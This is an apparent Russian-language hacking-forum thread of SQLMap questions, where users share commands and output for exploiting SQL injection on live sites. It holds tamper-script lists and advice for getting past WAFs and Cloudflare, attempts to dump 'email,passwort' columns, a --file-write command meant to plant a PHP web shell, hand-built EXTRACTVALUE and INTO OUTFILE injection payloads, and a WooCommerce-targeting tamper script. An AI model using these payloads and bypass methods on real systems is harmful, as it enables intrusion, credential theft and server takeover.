Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    После
    Code:
    --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
    Выдал

    Code:
    [01:16:41] [CRITICAL] unable to retrieve the tables for any database
    [01:16:41] [WARNING] HTTP error codes detected during run:
    414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
    [01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Как можно обойти waf ?
    Заранее спасибо!
     
  2. man474019

    man474019 New Member

    Joined:
    31 Jul 2015
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    ни как не могу дампит table_names, пробовал --hex, --no-cast tamper scripts

    Code:
    
    [05:46:09] [INFO] fetching tables for database: 'ar_new'
    [05:46:09] [INFO] fetching number of tables for database 'ar_new'
    you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
    [05:46:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [05:46:10] [INFO] retrieved:
    [05:46:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [05:46:11] [WARNING] unable to retrieve the number of tables for database 'ar_new'
    [05:46:11] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [05:46:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sayt.com'
    
    
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0

    а есть где то полный мануал от тебя ?
     
  4. Juiseppe

    Juiseppe New Member

    Joined:
    16 Feb 2020
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь мапом обходил Imunify360 (CloudLinux) waf ?
     
  5. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    Ошибка на отрицательный лимит
     
    #1125 Baskin-Robbins, 8 May 2021
    Last edited: 9 May 2021
    seostock likes this.
  6. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, отсканировал сайт Acunetix, нашел sql уязвимость, но sqlmap не может пробить ее, думаю из-за WAF. Как понять, какой tamper использовать, или же как вытащить необходимую информацию для sqlmap из Acunetix?
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    238
    Likes Received:
    435
    Reputations:
    131
    Это не много не так работает. Сначала необходимо раскрутить уязвимость самому, а потом автоматизировать процесс средствами sqlmap. Соответственно, что бы понять какой тампер использовать - раскрути сначала руками.
     
    K800 and Svan like this.
  8. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь сдампить данные и вот уже почти час у меня вот такое:
    [INFO] fetching entries of column(s) 'email,passwort' for table....
    Без каких либо движений. Может быть такое,что sqlmap долго считает колличество строк,если база большая?
     
  9. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    184
    Likes Received:
    4
    Reputations:
    0
    sql на магенто
    /result/?q=1'
    Акунетикс нашел sql даже выдернур имя БД

    Code:
    Proof of Exploit
    SQL query - SELECT database()
    
    admin8sasdasd
    При отправке через бурп
    site/result/?q=1'
    Ответ:

    Code:
    HTTP/1.1 503 Service Unavailable
    <pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
    <strong>Trace:</strong>
    <p>Error log record number:
    <address class="copyright">Magento is a trademark of Magento Inc. Copyright &copy; 2010 Magento Inc.</address>
    Но при попытки крутануть мапом! Не видит скулю(
    Пробывал --text-only

    Может какой темпер есть под магенто?
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Тут надо руками смотреть, на что срабатывает эррор и руками под это дело подгонять уже тампер.
     
    _________________________
    joelblack likes this.
  11. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
    Code:
    [INFO] retrieved: 'root@localhost'
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php

    >>Не льет, хотя права есть

    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell

    select user()
    Code:
    [INFO] retrieved: 'root@localhost'
    select 'test' into outfile '/var/www/test.txt'
    Code:
    [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    
    Что можно попробовать? Или в error-based inj не выполняется into outfile ? load_file работает
     
    #1131 Рамос, 11 Jul 2021
    Last edited: 11 Jul 2021
  12. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    Привилегии типа FILE != правам на запись в директорию
    +
    вы не показали привилегии юзера, root@localhost не обязательно рутовый пользователь мускула,
    но я думаю вы это знаете.

    По идее должен, так как юнион, еррор и тд различаются по способу получения инфы, т.е. один и тот же запрос
    может быть и union и error и time-based и blind и stack queries, правда это относится не ко всем запросам и субд.

    Правда мне не совсем понятно, почему отработал первый запрос, но ошибка на второй, ну да ладно.
    +

    В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.
     
    #1132 Baskin-Robbins, 12 Jul 2021
    Last edited: 12 Jul 2021
    Рамос and seostock like this.
  13. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
    Code:
    [23:12:06] [INFO] fetching current user
    [23:12:07] [INFO] retrieved: 'root@localhost'
    
    [*] 'root'@'localhost' (administrator) [28]:
        privilege: ALTER
        privilege: ALTER ROUTINE
        privilege: CREATE
        privilege: CREATE ROUTINE
        privilege: CREATE TABLESPACE
        privilege: CREATE TEMPORARY TABLES
        privilege: CREATE USER
        privilege: CREATE VIEW
        privilege: DELETE
        privilege: DROP
        privilege: EVENT
        privilege: EXECUTE
        privilege: FILE
        privilege: INDEX
        privilege: INSERT
        privilege: LOCK TABLES
        privilege: PROCESS
        privilege: REFERENCES
        privilege: RELOAD
        privilege: REPLICATION CLIENT
        privilege: REPLICATION SLAVE
        privilege: SELECT
        privilege: SHOW DATABASES
        privilege: SHOW VIEW
        privilege: SHUTDOWN
        privilege: SUPER
        privilege: TRIGGER
        privilege: UPDATE
    @@secure_file_priv
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
    [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
    [23:18:45] [INFO] resumed: ' '
    select @@secure_file_priv: ' '
    --technique=E
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
    
    [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    --technique=B
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
    
    [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    С правами все нормально, не могу понять только почему не выполняется into outfile
     
    #1133 Рамос, 12 Jul 2021
    Last edited: 12 Jul 2021
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно,
    давно не юзал.
    +
    https://github.com/sqlmapproject/sqlmap/issues/619
    Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
    не знаю, я бы включил verbose на максимум, попробовал руками.
    Больше, наверное, ничем не смогу помочь.
     
    #1134 Baskin-Robbins, 13 Jul 2021
    Last edited: 13 Jul 2021
    Рамос and seostock like this.
  15. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    Тогда уже тут я бессылен. Либо нужно идти в другую тему или забить)

    SELECT user();
    qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
    Code:
    General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'

    SELECT 123 INTO OUTFILE '/tmp/test.txt';

    qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
    qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
    qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
     
    #1135 Рамос, 13 Jul 2021
    Last edited: 14 Jul 2021
  16. birdborn

    birdborn New Member

    Joined:
    15 Jul 2021
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    IIS/dbms:mssql
    boolean-based blind/error-based
    1. при technique=B --is-dba=true при technique=E --is-dba=false. почему?
    2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц.
    как заставить скульмап вывести таблицы ?:rolleyes:

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
    Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
    Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
    ---
    [INFO] fetching tables for database: db1
    [PAYLOAD] -1789
    [PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
    [WARNING] the SQL query provided does not return any output
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    424
    Likes Received:
    304
    Reputations:
    5
    С клаудом туго, в открытом доступе тамперов под него нету. Как вариант искать реальный ИП ,что не всегда у получается
     
  18. xuanruou

    xuanruou New Member

    Joined:
    11 Apr 2012
    Messages:
    47
    Likes Received:
    1
    Reputations:
    0
    Приветствую
    Что можно сделать, чтобы обойти это?
    Code:
    http://45.56.90.204/demovul/demo.txt
    Code:
    /usr/bin/python2.7 sqlmap.py -u 'http://45.56.90.204/demovul/index.php/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and' --level 5 --risk 3 --tamper=tripleencode   -Ddemo_vul2 --tables

    Screenshot 2021-07-22 214546.png Screenshot 2021-07-20 170848.png Screenshot 2021-07-22 220935.png

    tripleencode.py
    Code:
    #!/usr/bin/env python
    
    """
    POC assistance for WooCommerce SQL Injection, Triple URL Encodes payload.
    
    Endpoint: /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and
    
    Author: Zeroauth
    Social: https://twitter.com/zeroauth
    Site: https://zeroauth.ltd/blog
    """
    
    import string
    import urllib
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOWEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        retVal = payload + '#'
    
        retVal = urllib.quote(retVal)
        retVal = urllib.quote(retVal)
        retVal = urllib.quote(retVal)
    
        return retVal

    Заранее спасибо!
     
    #1138 xuanruou, 22 Jul 2021
    Last edited: 22 Jul 2021
Loading...